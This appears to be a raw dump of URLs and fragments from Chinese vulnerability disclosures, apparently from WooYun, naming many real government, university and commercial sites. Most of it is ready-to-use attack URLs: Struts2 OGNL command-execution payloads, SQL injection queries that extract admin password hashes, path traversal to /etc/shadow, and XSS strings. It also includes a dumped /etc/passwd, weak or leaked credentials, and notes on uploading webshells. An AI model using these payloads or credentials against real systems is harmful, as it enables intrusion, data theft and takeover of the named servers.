http://newinfo.lvmama.com/locoy/locoy2050.php?mod=phpcms&file=content&action=add&catid=69 http://newinfo.lvmama.com/locoy/locoy2050.php浏览这个的时候 http://wooyun.org/actdo.php?action=sms&do=sendcontact&corpid=【厂商ID】&whitehatid=【白帽子id】 http://zfxxgk.nj.gov.cn/news/ http://ss.263.net/portal/user/userRegister.action http://xxxx/cmseasy/bbs/add-archive.php?cid=1 ip:115.***.***.24\115.***.***.25\115.***.***.50 user:t420is root:admin@wj http://attach.blackbap.org/xinnetol.rar http://www.xmbus.gov.cn/ http://www.xmbus.gov.cn//admini/index.php?m=system&s=bakup&a=download&filename=../../index.php http://www.xmbus.gov.cn//config/7.php http://www.secoo.com/shoppingCart/cart/shoppingCartAction_queryCart.action 
http://www.secoo.com/shoppingCart/cart/shoppingCartAction_queryCart.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23kxlzx%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%29%2c%23kxlzx.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29 http://121.28.49.3/hbzy/ http://121.28.49.3/hbzy/1.rar http://121.28.49.3/hbzy/2.rar http://121.28.49.3/hbzy/main.jsp http://159.226.97.160/Web/sql.asp www.fgw.cas.cn www.casjob.com www.gh.cas.cn http://www.sn.stats.gov.cn/zmhd.asp?menuId=2011&pmenuId=20 http://2sc.sohu.com/搜狐二手车里发布出售信息的时候。对车况介绍:没有任何过滤。后台直接输出 http://online.hoau.net:8080/THOMS/logining.do http://infoaudit.baihe.com/UserManage.jsp http://xss http://profile.baihe.com/ http://dalian.tuchong.com http://www.fantong.com/wuxi-pin/ http://www.fantong.com/cook-362754/ http://lib.bift.edu.cn:80/detail.asp?map=/movement/20121231104547691.jpg&id=11 http://lib.bift.edu.cn:80/Test2012/piao_deal.asp?page=2 http://lib.bift.edu.cn:80/vote_idea.asp?page=2 http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=&page=2 http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=88888 http://lib.bift.edu.cn:80/briefInf.asp?page=2 http://lib.bift.edu.cn:80/acNavi.asp?page=2 http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=88888 http://61.168.11.30:8011/AirChargeWeb/login!login.action http://wooyun.org/bugs/wooyun-2010-019550 http://w.sohu.com/ http://www.epailive.com/bottomAction_bottom_include.do?fileName=about.jsp http://www.epailive.com/bottomAction_bottom_include.do?fileName=../WEB-INF/web.xml http://www.taiyuan.gov.cn/?yy=973&b=107428 
http://www.taiyuan.gov.cn/?yy=973&b=107428 http://www.taiyuan.gov.cn/?yy=973&b=107428 https://passport.coo8.com/sso/register.action存在命令执行漏洞,借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限),很可能获得webshell(当然我没有尝试获取)。可威胁用户数据的安全。电商网站存在这样的漏洞危害是非常严重的。 http://221.199.11.171:7070/Kjbm/index.action http://221.199.11.171:7070/Kjbm/baoming/login.action;jsessionid=96FBEA931257B1D6909B0150D9C49487 http://219.159.83.208:801/forui/corpinfo/corpbaseinfo.aspx http://www.gwbn.net.cn/AdminManage/Login.aspx http://www.gzgwbn.com.cn/job/cn/login.asp http://www.bjgwtel.net/wp-includes/ http://xxx:xxx@xxx.com/访问一个页面的时候,会提示“You http://aaaaaaaaa.xxxxxxx.baidu.com http://www.sindrax.cn/pma/ http://comment.info.hc360.com/存在任意命令执行漏洞,root权限。借助struts2的私有变量class.classLoader.jarPath可以执行任意命令(并且是root权限),很可能获得webshell(当然我没有尝试获取),进而可能威胁到用户的数据安全。因为是以root权限执行任意命令,可以获得服务器的完全控制权,并且可能以这台服务器为跳板威胁周围其它服务器的安全。 http://www.swufe-online.com/oa/docs/readFile.jsp?id=182 http://www.swufe-online.com/oa/docs/readFile.jsp?id=182 http://www.swufe-online.com/oa/docs/readFile.jsp?id=1820';select http://www.swufe-online.com/oa/docs/readFile.jsp?id=182';select http://gadget.talk.renren.com/redirects http://passport.renren.com/transfer.do?transfer=&origURL= http://www.renren.com/callback.do?t=&origURL= http://yx.kugou.com/yx.kugou.com.rar http://i.taobao.com/id http://www.haichanggroup.cn http://www.haichanggroup.cn/yp/subjianli.asp?id=22 http://active.b2b.hc360.com/wuqun/homea/crm/login.asp http://law.inc.hc360.com/finance/PrintPage.aspx?fund_id=200237 http://www.scaic.gov.cn:7010/ http://127.0.0.1/index.php?ac=order&at=orderupdae&bprice=anb&did[aa]=87|dcc|ccc|a1|a2|a3|a4|a5&amount=1 http://127.0.0.1/index.php?ac=order&at=orderupdae&bprice=anb&did[aa]=87|dcc|ccc|5f4f40bac141a48d05a94ac90514fe05|a2|a3|c8273f6a0177588459b1971c65829cc6|a5&amount=1 http://www.gssf.gov.cn/dwjs/showmsg.asp?name=%B6%D3%CE%E9%BD%A8%C9%E8&ID=32423%27 http://livecast.sina.com.cn/infolive/keyonline.php http://www.xirang.com/ 
http://www.4k4k.cn/user/usershow.asp?username=wwee11 http://bbs.hlgnet.com/jh.php?boardid=1 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=23342 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=23342 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=1 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=2 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=3 http://www.epailive.com/member/favoAction_delAppMemFavo.do?type=1&favoCateId=&orderBy=0&favoObjId=23342 http://www.uqee.com/service/appealquery http://www.uqee.com/e/admin/sectest.php,这个小马干掉。 www.kuailezu.com http://www.kuailezu.com http://www.kuailezu.com/user.php?m=member.info http://www.kuailezu.com/user.php?m=member.setMemberEmail http://ielts.etest.edu.cn/cn/?DocName=News20121214c&__id=AppMain.dsaNews.ShowNews http://ielts.etest.edu.cn/cn/?DocName=News20121214c http://ielts.etest.edu.cn/cn/?DocName=News20121214c http://tuchong.com/ javascript:document.cookie http://kaka.meitu.com/20100214/step1.php# http://web3.gsli.edu.cn:8090/rsc/info_show.asp?flag=%25u4EBA%25u4E8B%25u52A8%25u6001%20aboutid=273&aboutid=273 http://hd.sgamer.com/index.php?m=Ask&sid=101 http://wooyun.org/bugs/wooyun-2010-023668在之前我还给搜狐的朋友报了一个存储型xss,感觉还是很多问题的。这次则是出现在加关注的接口上。通过测试,发现加关注接口是通过get方式传输的。抓包得到如下数据 rv:20.0 http://dfzq.3g.qq.com/front/football.php?cmd=home&a=excise&nobak=1&ty=zsyl&t=1353891036&oid=2fc92877ddf7d3df&sid2=6472f9429563985b http://dfzq.3g.qq.com/front/football.php?cmd=home&a=excise&nobak=1&ty=zsyl&t=1353891036&oid=2fc92877ddf7d3df&sid2=6472f9429563985b http://www.renrendai.com/calculate.action?amount=120000&apr=11&repayTime=12000000&show=true&type=DEBX&manageFeeShow=true http://agent.xinnet.com/ http://support.zte.com.cn http://support.zte.com.cn/support/topicality/Homepage.aspx论坛 
http://item.taobao.com/item.htm?spm=a230r.1.0.224.BEYcmd&id=2703000597 http://hd.jsbc.com/bxlz/index.aspx http://www.hzfc.gov.cn/newfj.php?fid=7725 www.premedia.cn开刀吧 admin.data.house.sina.com.cn/newhouse/manage.php?&a=login http://gy.315.com.cn/freem!index.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) http://3g.56.com/index.php?action=Activity&do=Vlist&pn=2&id=196 http://milfans.news.sina.com.cn/admin/login.php http://rb.56.com/index.php?action=CategoryOne&do=Run&status=1&page=3&category_id=30 http://eat.gd.sina.com.cn/2008mssd/diy/content.php?id=4888 http://eat.gd.sina.com.cn/food_search/content.php?id=644 http://seme.bupt.edu.cn/login/Jeecms.do http://party.zj.com/ljddh/index.php?id=17 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin 
ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin mysqlftp:x:500:500::/data/yls:/sbin/nologin http://www.whrt.gov.cn:8200/web/tms/JobList.aspx?t=1 http://www.whrt.gov.cn:8200/web/tms/Page.aspx?id=43 http://help.10010.com/web/icc/chat/chat?c=1&s=1 http://onlinechat.gome.com.cn/web/common/doUpload.action http://im.e-picc.com.cn/web/icc/chat/chat?c=1&s=3 URL:http://client.cmge.com/admin/ error:function() http://shop.xunlei.com/?controller=myorder&action=result&id=1001 http://eg.chengdu.gov.cn/front/login/login!login.action javascript:alert(document.domain) http://huodong.56.com/2013/diaocha/index.php?id=25 http://fbt.02753.com/images/coins.png http://126.am/xxxx.js http://converse.56.com/movieshow/index.php?vodid=2 http://mail.qq.com http://www.baidu.com/s?word=FX6300%E6%80%A7%E8%83%BD%E6%B5%8B%E8%AF%95%E5%92%8C%E5%AF%B9%E6%AF%94%E6%B5%8B%E8%AF%95%EF%BC%882%E6%A5%BC%E6%9B%B4%E6%96%B0%E8%B6%85%E9%A2%91FX6300%E5%AF%B9%E6%AF%94I3+3220,%E5%AE%8C%E8%83%9C%EF%BC%9F%EF%BC%89&tn=sitehao123&ie=utf-8 http://huodong.56.com/2013/diaocha/index.php?id=25 http://xiu.56.com/ http://xiu.56.com/index.php?action=SnsApi&do=Publish http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg http://xiu.56.com/index.php?action=SnsApi&do=Publish http://c.p313.56img.com/photo2video/upImg/d1/68/2/thumb_kjtest09_5194f16315b20269.jpg\ px1624.sinaapp.com/t.js http://xiu.56.com/index.php?action=Sns&do=photoWall&uid=kjtest09 
http://xiu.56.com/index.php?action=SnsApi&do=DoFollow&attr=follow&t=0.8027756286319345&follow_user_id=用户名 http://www.gdzl.gov.cn/notice/login.do存在struts命令执行漏洞 http://www.gdzl.gov.cn http://corp.56.com/extmail/cgi/index.cgi http://wuxizazhi.cnki.net/ http://www.cnzz.cc/Soft/4611.html http://www.theskinfoodchina.cn http://jsca.miitbeian.gov.cn/icpproject_state/system/login/receiveTicket.action http://xjca.miitbeian.gov.cn/system/login/receiveTicket.action http://cqca.miitbeian.gov.cn/system/login/receiveTicket.action http://sxca.miitbeian.gov.cn/system/login/receiveTicket.action http://scca.miitbeian.gov.cn/system/login/receiveTicket.action http://ahca.miitbeian.gov.cn/system/login/receiveTicket.action http://sdca.miitbeian.gov.cn/system/login/receiveTicket.action http://www.channelping.net/indexAction.action http://baidu.my.leju.com/phpinfo.php http://kfy.whu.edu.cn/kfy/infsearch.action http://kyc.utibet.edu.cn/index.action?method=branchContent&id=44 http://conf.ccf.org.cn/ccice/firstPage/index.action http://www.tjjl.ac.cn/index.action http://display.sysu.edu.cn/web/webInstrument!list.action http://www.hedatj.gov.cn/cms/list!detail.action http://www.syfc.gov.cn/fqzj/fcxx.action http://www.scdxcfo.net/items/index.action?item_id=22 http://www.hualin.com.cn/zpxxAction!index.action http://www.sunnysky.net.cn/channel!Index.action http://www.ljsy.net/index.action http://univ.zte.com.cn/ztetrain/news/templates/view1.aspx?id=2131 http://tra-b2g.ceair.com/WebUI/ http://211.94.67.214:8080/wrs/rsSecureLogin.do?CmdID=458 http://211.94.67.214:8080/wrs/attachments.do?CmdID=450&file=D:\HuaweiTechnologies\iWebReportServer\bin\workspace\attachments\1922\Error_Log.txt http://123.125.116.180/ http://support.zte.com.cn/MOBILE/Application/HandSet/ShowHandSet.aspx?id=32120 http://support.zte.com.cn/support/topicality/uploadFrame.aspx http://support.zte.com.cn/support/uploads/下 http://tuan.szonline.net/ http://218.56.49.37:81/license!getExpireDateOfDays.action 
display:block;height:800px;width:600px http://www.xxx.com/admin/affiliate_ck.php?act=list&auid=121%20or%201=1%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23 http://www.momax.net.cn/chi/media1_detail.php?tid=1&Id=103 http://115.236.20.88:9103/ http://t.sohu.com/twAction/deleteTwitter http://www.mmachina.cn,便打开看了下发现是JEECMS搭建的,果断百度下相关信息,找到了默认后台,而且竟然是默认账户密码,进入后台,资源管理处上传JSP马得到webshell,上面发现好多人人网活动数据库和以前的活动程序啊,最近比较喜欢人人活动,激动啊,不过也就看了下目录,没动数据O(∩_∩)O哈! http://dp.sina.cn/dpool/tools/longbus/station.php?id=12152 http://newscms.house365.com/edit.php?ids=5433 http://ztc.sznews.com/ts/login/adminLogin.do http://ztc.sznews.com/ts/pages/lodge/login/default.jsp登录后在"我要表扬"页面直接上传jsp木马 http://www.insecure.org/nmap/ B1:1C:8E:BA:3B BA:07:FA http://photo.club.sohu.com/dragon/login.php http://photo.club.sohu.com/dragon/admin/creat_url_form.php http://photo.club.sohu.com/dragon/admin/commend_list.php?start=50&classid=2 http://imagesi.jstv.com/service.php http://www.indaa.sgcc.com.cn:8288/Login.aspx http://180.149.132.210 http://www.ccjczy.com/News.action?urlNewsID=2013423YB34 http://vgirl.weibo.com/bbs http://220.181.181.200 http://220.181.181.200///contact https://XXXX http://210.51.19.163/auth/index http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=3110033 http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=3110033 http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=1 http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=2 http://my.yihaodian.com/member/myCollection/deleteCollectionTag.do?tagProduct.tagID=3110033 http://tag.cernet.com/login.do http://icp.cernet.com/login.do 
http://big5.cntv.cn/gate/big5/xmg.xmtv.cn/board/onemessage.asp?id=10270 http://116.213.70.89/xdf/ http://sn.189.cn/shop/comboArea/htmls/21001753.html?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://ah.189.cn/shop/mobile/htmls/3025.html?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://cloud.189.cn/sendDownloadUrlMessage.action?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://118.123.221.116/t/sss.html?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://qh.189.cn/shop/mobile/htmls/2264.html?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,@org.apache.commons.io.FileUtils@readFileToString(new%20java.io.File(%22/etc/issue%22)) http://pcc.263.net/PCC/loginMail.do http://211.150.64.86/PCC/loginMail.do http://211.150.64.87/PCC/loginMail.do http://211.150.64.88/PCC/loginMail.do http://xss.retaker.me/1.js xss.retaker.me/1.js\\ http://chunjie.wlj-china.com/data.zip http://w.xdf.cn/TeacherCourse.html?teacherID=285341 http://p.hsort.com/SimpleShow.aspx?paperName=%e5%a4%a7%e5%90%8c%e6%96%b0%e9%97%bb%e7%bd%91%e6%95%b0%e5%ad%97%e6%8a%a5%e5%88%8a%ef%bc%8c%e7%94%b5%e5%ad%90%e6%8a%a5%e5%88%8a&qnum=1 inurl:qnum=;inurl:papername=,可以找到很多站点,大同新闻网,黑龙江经济报,西南政法大学报,广东外语外贸大学报,小地方的报纸等,部分使用的老版安全狗,很容易被绕过 http://110.75.32.56 http://crm2.qq.com/page/portalpage/reject_msg.php?k=b66b5cf124e37a6c0b67999373ca83b9ac9bc34586ef022dd688321c6c3c3ccd http://61.135.150.151 http://110.75.66.47/ d.youc.com/dede/ http://d.youc.com//plus/search.php?keyword=as&typeArr[111%3D@`\ 
http://www.polypay.cn/cnothers/ http://item.taobao.com/item.htm?spm=a230r.1.14.69.zk34BW&id=25101676408&_u=k3jfumt58e4 http://www.tmall.com/?ali_trackid=2:mm_34019173_0_0:1369039267_3k9_1575965793 http://yun.taosoft.com.cn/taoflash/swf/1666424963/1367227913539.swf?cid=tb1666424963&pid=c3dmLzE2NjY0MjQ5NjMvMTM2NzIyNzkxMzUzOS5zd2Y= http://www.locailed.com/cc/cc1.html http://yun.taosoft.com.cn/taoflash/swf/1666424963/1367227913539.swf?cid=tb1666424963&pid=c3dmLzE2NjY0MjQ5NjMvMTM2NzIyNzkxMzUzOS5zd2Y= http://www.locailed.com/cc/cc1.html_blank@ http://www.wuerth.com.cn/html/NewsView_cn.php?id=39 http://www.aliyun.com/user?m=ajaxcomm&ac=getuserstatus http://ts.21cn.com/Home/post http://tti.pw/index.php/1/ http://www.frg.renren.com/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://www.ztx.renren.com/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a http://big5.cntv.cn/gate/big5/ http://big5.cntv.cn/gate/big5/cms.cntv.cn/CMS/permission/loginajaxUserLoginAction.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@org.apache.commons.io.FileUtils@readFileToString http://wooyun.org/bugs/wooyun-2010-08281 http://sispub.ssr.chinacache.com)存在弱口令 test:test http://shsj.caep.ac.cn/zxzc/notice.asp?meetingid=3 http://zpxx.caep.ac.cn/login.asp http://yjsb.caep.ac.cn/LoginForWeb.aspx http://cms.caep.ac.cn:888/cms/ http://yjsb.caep.ac.cn/Default.aspx?ReturnUrl=%2fSecurity%2fPassWord%2fAdminPwd.aspx http://www.epanel.com.cn/epanelweb/client/bot/toPersonQuestion.htm 
URL:http://hy.shenzhenpost.com.cn/shop/member!passwordRecover.action http://www.icareishare.com.cn/soul/SoulFront/appointment_front_ashow.action?channelCode=10100&articleId=8a3f98963e9b5fc5013eb6ee07a8082a http://www.icareishare.com.cn/soul/SoulFront/appointment_front_ashow.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) http://q.stock.sohu.com/jlp/org/info.up?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() http://s.learning.sohu.com/search.sip?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() http://pic.yule.sohu.com/goSearch.sip?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() http://pic.music.sohu.com/goSearch.sip?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() 
http://pic.v.sohu.com/goSearch.sip?debug=command&expression=%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23req=@org.apache.struts2.ServletActionContext@getRequest(),%23xman=@org.apache.struts2.ServletActionContext@getResponse(),%23xman.getWriter().println(%23req.getRealPath(%22/%22)),%23xman.getWriter().close() http://jxjy.bfa.edu.cn http://ciscn.cn/jsp/index/downFile.jsp?filename=/../..//../..//../..//../..//../..//etc/shadow http://123.125.116.227/ http://oa.chinapay.com/yyoa/index.jsp http://www.seeyon.com/ http://www.now.cn/pay/itemstatus.net?IDAAction=5587144 http://203.95.110.84/ http://www.maxen.com.cn/plus/search.php?keyword=as&typeArr[111%3D@`\ http://www.maxen.com.cn/dede/login.php?gotopage=%2Fdede%2F http://www.91yong.com:4848/ https://zxl.91yong.com:4848/ admin:admin http://www.now.cn/domain-admin/Contactupdate.php?IDContact=43107116&isshow=true&code=a8bdd6b3615ebbc951e30c6cf8702a69&cType=%B9%FA%BC%CA%D3%F2%C3%FB http://www.now.cn/domain-admin/Contactupdate.php?IDContact=43107651&isshow=true&code=a8bdd6b3615ebbc951e30c6cf8702a69&cType=%B9%FA%BC%CA%D3%F2%C3%FB http://www.now.cn/domain-admin/Contactupdate.php?IDContact=43007122&isshow=true&code=a8bdd6b3615ebbc951e30c6cf8702a69&cType=%B9%FA%BC%CA%D3%F2%C3%FB http://s.weibo.com/user/&former=%22%3E%3Cimg%20onerror=alert%28/x/%29%20src=x%20/%3E%3C!-- http://yangshan.shciq.gov.cn/article.aspx?artid=622 http://yangshan.shciq.gov.cn/article.aspx?artid=622 http://ln.sina.com.cn/tools/new_frame.html?javascript:alert(1) http://info.theskinfoodchina.cn:8080/response/ http://info.theskinfoodchina.cn:8080/到浏览器打开出现了登陆界面 test:test的弱口令从而进入了邮件发送系统后台 http://data.auto.sina.com.cn/car/api/getCarInfo2motu.php?subid=573 http://data.auto.sina.com.cn/car/api/getCarInfo2motu.php?subid=573 http://bj.bbs.house.sina.com.cn:80/bbs/post/show?pid=5742081790378527840 http://bj.bbs.house.sina.com.cn:80/bbs/post/show?pid=5742081790378527840 http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/page_moduel/hqad.php?type=2 
http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/page_moduel/hqad.php?type=2 http://weidealer.auto.sina.com.cn/api/auto/difang/get_carpay_rec.php?callback=jsonp1369149048230&province=23&country=all&limit=6&t=jsonp&x=0.19883825746364892&city=1 http://weidealer.auto.sina.com.cn/api/auto/difang/get_carpay_rec.php?callback=jsonp1369149048230&province=23&country=all&limit=6&t=jsonp&x=0.19883825746364892&city=1 http://www.phpwind.net/read/2993589 http://www.xxxxxx.com.cn/edit/db/ewebeditor.mdb http://www.ocnsh.com.cn/admin/aspcheck.asp http://www.chinarishi.gov.cn/gonggaoneirong.php?id=448此处存在注入漏洞 http://www.cshtz.gov.cn/spweb/serviceOnline/baseinfo/baseinfoonline.jsp http://book.duokan.com/__duokan_appapi/packed/store/ipad_review.html?book_id=77779b94acd94d38a451bd69658f9bc3&build=2013030401 http://www.bidding.citic.com/work/work!workList_front.action javascript:alert(document.cookie) http://bj.58.com/xingqu/13977470055945x.shtml http://www.pmcitic.com/news/news!newsList_front.action?%28%27\43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27\43context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\75false%27%29%28b%29%29&%28%27\43c%27%29%28%28%27\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27\43req\75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28h%29%28%28%27\43webRootzpro\75@java.lang.Runtime@getRuntime%28%29.exec%28\43req.getParameter%28%22cmd%22%29%29%27%29%28d%29%29&%28i%29%28%28%27\43webRootzproreader\75new\40java.io.DataInputStream%28\43webRootzpro.getInputStream%28%29%29%27%29%28d%29%29&%28i01%29%28%28%27\43webStr\75new\40byte[1024]%27%29%28d%29%29&%28i1%29%28%28%27\43webRootzproreader.readFully%28\43webStr%29%27%29%28d%29%29&%28i111%29%28%28%27\43webStr12\75new\40java.lang.String%28\43webStr%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i2%29%28%28%27\43xman\75@org.apache
.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i95%29%28%28%27\43xman.getWriter%28%29.println%28\43webStr12%29%27%29%28d%29%29&%28i99%29%28%28%27\43xman.getWriter%28%29.close%28%29%27%29%28d%29%29&cmd=cmd%20/c%20ipconfig http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Huawei.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Dell.Force10.Switch.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=/2network http://10.1.0.107:8888/lm/collector/config/exportFile?filenames=Netflow.v5.xml&http_server_proxy=eyJjbHVzdGVyLXV1aWQiOiI0ODA3YmI4MC01N2RhLTRiZDEtODRlZC05ZDk4MDNkZGFkMjkiLCJjbHVzdGVyLW5vZGV0eXBlIjoiRXZlbnRDb2xsZWN0b3IifQ==&path=../ http://member.ffpic.com/tools/FindPass.ashx http://pmscjss.mofcom.gov.cn/auc/_news/newslist_common.jsp?cata=1 http://pmscjss.mofcom.gov.cn/auc/merge/sql.sql http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://zhidao.baidu.com/question/437176497.html http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=9 http://secaqb.anquanbao.org/sqlin.php?id=-9%20or(-1)in(1) http://secaqb.anquanbao.org/sqlin.php?id=-9%20union http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%20select http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%0b1,user(),version(),database() http://blog.anquanbao.org/61/ http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%201,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect-1,user(),version(),database() http://secaqb.anquanbao.org/sqlin.php?id=-9%20union%0bselect%2b1,user(),version(),database() 
